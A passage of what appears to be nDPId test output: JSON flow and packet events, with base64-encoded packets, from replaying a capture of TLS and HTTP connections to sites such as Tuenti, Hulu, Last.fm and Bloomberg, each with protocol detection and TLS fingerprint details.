AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 
+00896{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":373,"source":"sites.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482786097,"flow_last_seen":1646482786140,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482786140,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.170.91","src_port":39302,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tuenti","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"static.tuenti.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00952{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":374,"source":"sites.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482786097,"flow_last_seen":1646482786188,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482786188,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.170.91","src_port":39302,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tuenti","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"static.tuenti.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"61be9ce3d068c08ff99a857f62352f9d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
+01214{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":376,"source":"sites.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1646482786097,"flow_last_seen":1646482786188,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3831,"flow_avg_l4_payload_len":638,"midstream":0,"thread_ts_msec":1646482786188,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.170.91","src_port":39302,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tuenti","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"static.tuenti.com","server_names":"*.tuenti.com,tuenti.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"61be9ce3d068c08ff99a857f62352f9d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1","subjectDN":"C=ES, L=Madrid, O=Tuenti Technologies S.L., CN=*.tuenti.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"89:B8:FA:C7:22:04:D2:BE:C5:6E:59:10:31:67:42:B1:3F:6D:F8:3B"}} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":379,"source":"sites.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482791144,"flow_last_seen":1646482791144,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482791144,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.101.195.214","src_port":51432,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":379,"source":"sites.pcapng","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1646482791144,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482791144,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8FF5AAEAGQPrAqAGAX2XD1sjoAbs9AWSXAAAAAKAC+vBfJgAAAgQFtAQCCAoz72hZAAAAAAEDAwc="} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":380,"source":"sites.pcapng","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1646482791167,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482791167,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADMGYlhfZcPWwKgBgAG7yOhRyYQJPQFkmKAS\/ohadwAAAgQFtAQCCAoA0SpiM+9oWQEDAwc="} +01165{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":381,"source":"sites.pcapng","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1646482791170,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482791170,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5FGBAAEAGPvvAqAGAX2XD1sjoAbs9AWSYUcmECoAYAfYkYQAAAQEICjPvaHMA0SpiFgMBAgABAAH8AwPkjLny33P+mExr32cMRl62\/8RJSZlKid1V05U+ySIWLCA+yoN1VMfFXakU81pmrArAv4PMFa74gV6zhhtZIkRahgAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAANAAsAAAhodWx1LmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACATY1QXYS0qh7KvKliQF74PNyaFCqlZEZicpu9ccKADKQAXAEEEtcC0kqJMuUk4fNE8PcFvshva3wSMZbKQk5Gr6YxJX1t14RCVX0X4nJLqvHYB8ofAk7LBbtBWK6qUGB5XQIzcOQArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +00884{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":381,"source":"sites.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482791144,"flow_last_seen":1646482791170,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482791170,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.101.195.214","src_port":51432,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Hulu","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"hulu.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00925{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":382,"source":"sites.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482791144,"flow_last_seen":1646482791191,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482791191,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.101.195.214","src_port":51432,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Hulu","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"hulu.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":383,"source":"sites.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482801387,"flow_last_seen":1646482801387,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482801387,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"34.96.123.111","src_port":44954,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":383,"source":"sites.pcapng","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1646482801387,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482801387,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8u7RAAEAGHxDAqAGAImB7b6+aAFDTrORQAAAAAKAC+vAeUwAAAgQFtAQCCAqmtsAlAAAAAAEDAwc="} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":384,"source":"sites.pcapng","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1646482801394,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482801394,"pkt":"PKn0qB\/spJGxgjQ5CABFgAA8tJQAAHkGLLAiYHtvwKgBgABQr5rfpgWE06zkUaAS\/\/9QBgAAAgQFlgQCCArcngeAprbAJQEDAwg="} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":385,"source":"sites.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482802720,"flow_last_seen":1646482802720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482802720,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"35.201.112.136","src_port":47122,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":385,"source":"sites.pcapng","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1646482802720,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482802720,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8g6pAAEAGYJjAqAGAI8lwiLgSAbvaEoGzAAAAAKAC+vAuRQAAAgQFtAQCCArAZPJXAAAAAAEDAwc="} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":386,"source":"sites.pcapng","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1646482802726,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482802726,"pkt":"PKn0qB\/spJGxgjQ5CABFgAA8b+kAAHkGetkjyXCIwKgBgAG7uBJNy0p52hKBtKAS\/\/9IWQAAAgQFlgQCCArHroD1wGTyVwEDAwg="} 
+01169{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":387,"source":"sites.pcapng","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1646482802732,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482802732,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5g6xAAEAGXpnAqAGAI8lwiLgSAbvaEoG0TctKeoAYAfa\/ZwAAAQEICsBk8mLHroD1FgMBAgABAAH8AwM6s1cKgDvTG3LALyk7fAmvRJX9DNZN37XWMNl1\/SdHaCCUR56oKGM2UcODstsWkptKjiMgLAJPLuO56cI3NFuiCgAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAASABAAAA1rZXJ2ZS5sYXN0LmZtABcAAP8BAAEAAAoADgAMAB0AFwAYABkBAAEBAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAAiAAoACAQDBQMGAwIDADMAawBpAB0AIEXwFTh8NFdQPbVwjRz3qZyMML4Z+FJITLECgKzAH2YhABcAQQROHWQ9TZ\/FNyVoueylOLPpt31B2wF8YuKZg+41\/WG\/Ucaum9xuzZgJXugnVJqsHgtbN0plSfDPGhyRi1GNW\/CAACsABQQDBAMDAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAQAcAAJAAQAVAIkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +00887{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":387,"source":"sites.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482802720,"flow_last_seen":1646482802732,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482802732,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"35.201.112.136","src_port":47122,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.LastFM","breed":"Fun","category":"Music"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"kerve.last.fm","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00928{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":388,"source":"sites.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482802720,"flow_last_seen":1646482802742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1646482802742,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"35.201.112.136","src_port":47122,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.LastFM","breed":"Fun","category":"Music"},"tls": {"version":"TLSv1.3","client_requested_server_name":"kerve.last.fm","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":389,"source":"sites.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482825245,"flow_last_seen":1646482825245,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482825245,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"69.191.252.15","src_port":39036,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":389,"source":"sites.pcapng","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1646482825245,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482825245,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8fBNAAEAGurHAqAGARb\/8D5h8AFDXP+M5AAAAAKAC+vDCpAAAAgQFtAQCCArIaWrDAAAAAAEDAwc="} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":390,"source":"sites.pcapng","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1646482826257,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482826257,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8fBRAAEAGurDAqAGARb\/8D5h8AFDXP+M5AAAAAKAC+vC+sAAAAgQFtAQCCArIaW63AAAAAAEDAwc="} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":391,"source":"sites.pcapng","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1646482828277,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482828277,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8fBVAAEAGuq\/AqAGARb\/8D5h8AFDXP+M5AAAAAKAC+vC2zAAAAgQFtAQCCArIaXabAAAAAAEDAwc="} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":394,"source":"sites.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482844787,"flow_last_seen":1646482844787,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482844787,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.193.73","src_port":43412,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":394,"source":"sites.pcapng","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1646482844787,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482844787,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8DedAAEAGEf7AqAGAl2XBSamUAbtMTKsLAAAAAKAC+vDPdgAAAgQFtAQCCApUsmtnAAAAAAEDAwc="} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":395,"source":"sites.pcapng","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1646482844795,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482844795,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADkGJuWXZcFJwKgBgAG7qZRSHsTXTEyrDKAS\/\/9OHAAAAgQFTAQCCAoo5zzDVLJrZwEDAwk="} 
+01168{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":396,"source":"sites.pcapng","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1646482844798,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482844798,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5DelAAEAGD\/\/AqAGAl2XBSamUAbtMTKsMUh7E2IAYAfYA+gAAAQEIClSya3Io5zzDFgMBAgABAAH8AwORBDzSmJ5ztCo20SFZ11gW0AoQQ4sgaFZaA3Y+KP\/wXyDr7yv9lTOmWoS6i6wF3DRKGiQ0dwIiiuA6PbPxGRgIZwAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAWABQAABF3d3cuYmxvb21iZXJnLmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACDquIWld0x6v\/7S4zdZ49LOkRXJqmmpTXYEodSal6cCHwAXAEEEAIPYMeBzwG1ajydlfuoJM30LuOrUqddbx+YHyLZsEMUExIIuEeju0UTUsS5CFNGsqSGbD968lENk0xLpNURtmQArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":396,"source":"sites.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482844787,"flow_last_seen":1646482844798,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482844798,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.193.73","src_port":43412,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Bloomberg","breed":"Acceptable","category":"Cloud"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.bloomberg.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00957{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":397,"source":"sites.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482844787,"flow_last_seen":1646482844815,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":1857,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1646482844815,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.193.73","src_port":43412,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Bloomberg","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.bloomberg.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01825{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":399,"source":"sites.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1646482844787,"flow_last_seen":1646482844815,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":4537,"flow_avg_l4_payload_len":756,"midstream":0,"thread_ts_msec":1646482844815,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.193.73","src_port":43412,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Bloomberg","breed":"Acceptable","category":"Cloud"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.bloomberg.com","server_names":"www.bloomberg.com,api.businessweek.com,api.bwbx.io,assets.bwbx.io,byzantium.bloomberg.com,cdn-mobapi.bloomberg.com,cdn-videos.bloomberg.com,cdn.gotraffic.net,charts.bloomberg.com,embeds.bloomberg.com,fastly.bloomberg.tv,feeds.bloomberg.com,fonts.gotraffic.net,staging-assets.bwbx.io,nav.bloomberg.com,sponsored.bloomberg.com,spotlight.bloomberg.com,tictoc.video,www.bbthat.com,www.bloomberg.co.jp,www.bloomberg.co.jp.shared.bloomberga.com,www.bloomberg.com.shared.bloomberga.com,www.bloombergview.com,www.citylab.com,www.citylab.com.shared.bloomberga.com,www.quicktake.video,www.tictoc.video,cdn-api.cmobile.bloomberg.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1","subjectDN":"C=US, ST=New York, L=New York, O=Bloomberg LP, CN=www.bloomberg.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"88:4A:85:34:1D:E6:C0:BE:5E:C6:14:BB:BA:94:A3:55:92:BA:95:82"}} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":403,"source":"sites.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482845216,"flow_last_seen":1646482845216,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482845216,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.139.210.102","src_port":57014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":403,"source":"sites.pcapng","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1646482845216,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482845216,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8ZOJAAEAG1L\/AqAGAbIvSZt62AbvYtDuvAAAAAKAC+vDuhAAAAgQFtAQCCAq3z7DKAAAAAAEDAwc="} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":404,"source":"sites.pcapng","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1646482845236,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482845236,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8MSYAAPgGkHtsi9JmwKgBgAG73rYdOl\/82LQ7sKAS\/\/9A+gAAAgQFoAQCCAoefQzKt8+wygEDAwg="} 